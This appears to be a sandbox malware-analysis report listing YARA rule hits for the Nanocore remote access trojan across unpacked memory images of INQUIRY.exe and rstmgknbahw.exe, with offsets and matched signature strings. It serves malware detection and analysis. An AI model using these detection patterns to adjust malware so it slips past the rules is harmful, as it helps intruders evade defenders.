4.2.rstmgknbahw.exe.3950e14.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28259:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29334:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28273:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.3950e14.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.1.rstmgknbahw.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.1.rstmgknbahw.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.1.rstmgknbahw.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.1.rstmgknbahw.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.2.rstmgknbahw.exe.4980000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.4980000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.4980000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.4980000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.rstmgknbahw.exe.3950e14.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
4.2.rstmgknbahw.exe.3950e14.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.3950e14.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.415058.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.415058.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.415058.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.415058.10.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.rstmgknbahw.exe.49d0000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.49d0000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.49d0000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.49d0000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.0.INQUIRY.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
6.0.rstmgknbahw.exe.400000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.2.rstmgknbahw.exe.4940000.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.4940000.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.4940000.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.4940000.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.0.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
4.1.rstmgknbahw.exe.400000.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.1.rstmgknbahw.exe.400000.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
4.1.rstmgknbahw.exe.400000.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.1.rstmgknbahw.exe.400000.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
4.2.rstmgknbahw.exe.400000.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.400000.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.400000.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.400000.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
4.0.rstmgknbahw.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
2.0.INQUIRY.exe.415058.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.415058.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
2.0.INQUIRY.exe.415058.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.415058.10.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
2.0.INQUIRY.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
6.2.rstmgknbahw.exe.638d50.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.638d50.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.638d50.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.638d50.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.rstmgknbahw.exe.394bfde.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d08f:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0bc:$x2: IClientNetworkHost
4.2.rstmgknbahw.exe.394bfde.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d08f:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e16a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0a9:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.394bfde.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.394bfde.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d045:$a: NanoCore 0x2d05a:$a: NanoCore 0x2d08f:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce01:$b: ClientPlugin 0x2ce1c:$b: ClientPlugin
4.0.rstmgknbahw.exe.400000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
2.0.INQUIRY.exe.415058.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.415058.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
2.0.INQUIRY.exe.415058.12.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.415058.12.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.0.INQUIRY.exe.400000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
